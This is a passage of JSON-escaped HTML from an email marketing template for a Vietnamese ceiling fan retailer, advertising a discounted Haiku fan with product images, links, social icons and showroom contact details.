(mso)|(IE)]><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 25px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\" style=\\\"height:37px; v-text-anchor:middle; width:145px;\\\" arcsize=\\\"2.5%\\\"  strokecolor=\\\"#CCC\\\" strokeweight=\\\"1px\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#a87f6b;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #a87f6b; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">T\\u00ccM HI\\u1ec2U TH\\u00caM<\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678340442333-mau-sau-haiku-L.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681813445393-HaikuL_1000Res_Caramel_White.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 10px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #e03e2d; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-family: \'comic sans ms\', sans-serif; line-height: 19.6px;\\\"><span style=\\\"font-size: 34px; line-height: 47.6px;\\\"><strong>Sale Off 15%<br \\/>Ch\\u1ec9 c\\u00f2n 19.040.000 \\u20ab<br \\/><\\/strong><\\/span><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 20px; font-weight: 400; color: #34495e; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 28px;\\\">L\\u1ef0A CH\\u1eccN QU\\u1ea0T TR\\u1ea6N \\u0110\\u00daNG C\\u00c1CH<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:5px 10px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"48%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #34495e;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 160%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">V\\u1edbi 03 \\u0111\\u01b0\\u1eddng k\\u00ednh c\\u00e1nh, 03 t\\u00f9y ch\\u1ecdn l\\u1eafp \\u0111\\u1eb7t v\\u00e0 nhi\\u1ec1u lo\\u1ea1i c\\u00f3 s\\u1eb5n<br \\/>gi\\u1ea3m chi\\u1ec1u d\\u00e0i, Haiku l\\u00e0 m\\u1ed9t gi\\u1ea3i ph\\u00e1p tho\\u1ea3i m\\u00e1i tao nh\\u00e3 cho h\\u1ea7u nh\\u01b0 b\\u1ea5t k\\u1ef3<br \\/>kh\\u00f4ng gian, t\\u1eeb c\\u0103n h\\u1ed9 studio \\u1ea5m c\\u00fang cho \\u0111\\u1ebfn m\\u00e1i hi\\u00ean ngo\\u00e0i tr\\u1eddi.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 40px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/drive.google.com\\/file\\/d\\/1M827CJDInvngku46rJxTUGe2U_b5PTZp\\/view\\\" style=\\\"height:37px; v-text-anchor:middle; width:393px;\\\" arcsize=\\\"2.5%\\\"  strokecolor=\\\"#CCC\\\" strokeweight=\\\"1px\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#236fa1;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/drive.google.com\\/file\\/d\\/1M827CJDInvngku46rJxTUGe2U_b5PTZp\\/view\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #236fa1; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">XEM H\\u01af\\u1edaNG D\\u1eaaN L\\u1ef0A CH\\u1eccN S\\u1ea2I C\\u00c1NH PH\\u00d9 H\\u1ee2P ?<\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #a5726e; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 14px; line-height: 19.6px;\\\"><strong><span style=\\\"line-height: 19.6px; font-size: 14px;\\\">F O L L O W&nbsp; &nbsp;A L O N G&nbsp; &nbsp;W I T H&nbsp; &nbsp;U S<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"28%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #ca979a;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:183px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"183\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:183px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/pinterest.com\\/\\\" title=\\\"Pinterest\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/pinterest.png\\\" alt=\\\"Pinterest\\\" title=\\\"Pinterest\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/youtube.com\\/\\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/instagram.com\\/\\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/instagram.png\\\" alt=\\\"Instagram\\\" title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/soundcloud.com\\/\\\" title=\\\"SoundCloud\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/soundcloud.png\\\" alt=\\\"SoundCloud\\\" title=\\\"SoundCloud\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 150%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 150%;\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<br \\/>EMAIL: <a rel=\\\"noopener\\\" href=\\\"mailto:sale@hogiaphat.vn\\\" target=\\\"_blank\\\">sale@hogiaphat.vn\\u00a0<\\/a><\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">-----------o0o------------<br \\/>SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<br \\/>\\u00a0<br \\/>\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\"><strong>C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<\\/strong><br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #a47e6b;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #a47e6b;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table 